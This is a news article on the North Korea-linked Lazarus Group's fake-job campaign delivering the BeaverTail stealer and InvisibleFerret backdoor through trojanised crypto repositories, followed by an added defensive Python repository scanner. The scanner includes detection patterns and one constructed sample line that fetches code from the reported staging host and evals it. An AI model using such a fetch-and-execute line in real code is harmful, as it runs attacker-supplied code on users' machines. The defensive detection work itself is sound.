North Korea-Linked Lazarus Group Exploits Fake Job Offers to Distribute Malware
In a recent cybersecurity revelation, the Lazarus Group, a hacking organization with ties to North Korea, has been linked to an ongoing campaign that exploits fake job offers on LinkedIn within the cryptocurrency and travel sectors. This malicious endeavor aims to deliver sophisticated malware capable of infecting Windows, macOS, and Linux operating systems.
The Scam Unfolds
According to a report by the cybersecurity firm Bitdefender, the scam initiates through messages sent on LinkedIn, targeting professionals with promises of remote work, flexible part-time hours, and competitive pay. Once the target shows interest, the scammer masquerades as a recruiter and requests sensitive information, including a resume or a link to the victim’s personal GitHub repository.
Bitdefender cautioned that while these requests may appear innocuous, they often serve malicious purposes. By harvesting personal data, the scammers lend their operation a façade of legitimacy, effectively drawing victims deeper into the scheme.
The Delivery Mechanism
After collecting the requested details, the attacker, still posing as a recruiter, shares a link to a GitHub or Bitbucket repository. This link typically leads to a minimum viable product (MVP) version of a seemingly legitimate decentralized exchange (DEX) project. Embedded within the project’s code is an obfuscated script designed to fetch a second-stage payload, a cross-platform JavaScript information stealer, from a compromised site, api.npoint[.]io.
This stealer is engineered to extract data from various cryptocurrency wallet extensions installed on the victim’s browser. It also functions as a loader, enabling the download of a Python-based backdoor that monitors clipboard changes, maintains remote access, and facilitates the installation of additional malware.
Insights from Cybersecurity Experts
Bitdefender identified the infection methods as part of a broader attack cluster termed ‘Contagious Interview,’ also known as DeceptiveDevelopment or DEVPOPPER. This cluster is notably crafted to deploy a JavaScript stealer, known as BeaverTail, alongside a Python implant called InvisibleFerret.
“The analyzed malware appears to be from the Contagious Interview cluster,” stated a representative from Bitdefender Labs. “However, it’s important to note that the JavaScript sample we’ve examined shows differences from previous BeaverTail samples, indicating that threat actors are continually evolving their tactics.”
A Multifaceted Threat
The malware circulated via this scheme is a complex .NET binary capable of initiating a TOR proxy server to communicate with command-and-control (C2) servers. This malware can exfiltrate basic system information, deliver further payloads, siphon sensitive data, log keystrokes, and even activate a cryptocurrency miner.
Bitdefender described the infection chain as intricate, employing malicious software written in various programming languages and leveraging multiple technologies. This includes multi-layered Python scripts that execute recursively, a JavaScript stealer that gathers browser data, and .NET-based programs that can disable security tools and configure TOR proxies.
A Widespread Operation
There is emerging evidence that this campaign could be widespread, as discussions about these tactics have surfaced on platforms like LinkedIn and Reddit. In some variations of the scam, potential candidates are instructed to clone Web3 repositories and execute them locally as part of the interview process. In other instances, they are tasked with fixing intentionally planted bugs in the code.
For instance, Bitdefender noted the existence of a Bitbucket repository named ‘miketoken_v2,’ which has since been taken down. Although these repositories have been removed, Bitdefender confirmed that the activity still aligns with the same overarching campaign, even as the names of repositories and recruiter profiles continue to be shuffled.
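The dropper described above (an obfuscated script inside a cloned repository that fetches a second stage from api.npoint[.]io) and the instruction to clone and run a Web3 repository locally suggest a simple pre-execution triage step. The following is an added example, not code from the article or from Bitdefender: a scanner that flags source files referencing the staging host named in the report, combining a remote fetch with dynamic code execution, or carrying long encoded blobs. The regular expressions and thresholds are the author's assumptions, and the sample inputs are constructed.

```python
import re
import sys
from pathlib import Path

# Staging host named in the Bitdefender report (defanged in the article as api.npoint[.]io).
STAGING_HOSTS = ("api.npoint.io",)

# Heuristics (assumed, not from the report): a remote fetch whose result is handed to a
# dynamic-execution sink, and obfuscation in the form of long encoded literals or hex escapes.
REMOTE_FETCH = re.compile(r"\b(?:fetch|axios\.get|https?\.get|request)\s*\(", re.I)
DYNAMIC_EXEC = re.compile(r"\b(?:eval|Function|vm\.runInThisContext)\s*\(")
LONG_BLOB = re.compile(r"['\"][A-Za-z0-9+/=_\-]{200,}['\"]")
HEX_ESCAPES = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")

def triage_source(text):
    """Return a list of human-readable findings for one source file (empty if clean)."""
    findings = []
    lowered = text.lower()
    for host in STAGING_HOSTS:
        if host in lowered:
            findings.append(f"references known staging host {host}")
    if REMOTE_FETCH.search(text) and DYNAMIC_EXEC.search(text):
        findings.append("fetches remote content and executes code dynamically")
    if LONG_BLOB.search(text):
        findings.append("contains a long encoded string literal (>=200 chars)")
    if HEX_ESCAPES.search(text):
        findings.append("contains runs of hex-escaped characters")
    return findings

def triage_repo(root, exts=(".js", ".cjs", ".mjs", ".ts", ".py")):
    """Walk a cloned repository (skipping node_modules) and map file -> findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in exts and "node_modules" not in path.parts:
            findings = triage_source(path.read_text(errors="ignore"))
            if findings:
                report[str(path.relative_to(root))] = findings
    return report

# Constructed samples for demonstration; the first mimics only the fetch-then-execute shape.
CONSTRUCTED_DROPPER = "const u='https://api.npoint.io/EXAMPLE_ID';\nfetch(u).then(r=>r.text()).then(t=>eval(t));\n"
CONSTRUCTED_BENIGN = "export const add = (a, b) => a + b;\n"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for file, hits in triage_repo(target).items():
        print(f"{file}: {'; '.join(hits)}")
```

Run it against the cloned repository before executing anything in it; a non-empty report is a reason to stop and inspect the flagged files rather than to run the project as instructed.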
Conclusion
This disclosure follows closely on the heels of another report by SentinelOne, which highlighted similar tactics related to the ‘Contagious Interview’ campaign being used to deliver malware known as FlexibleFerret. As digital threats continue to evolve, the importance of vigilance in online interactions and the verification of job offers is paramount.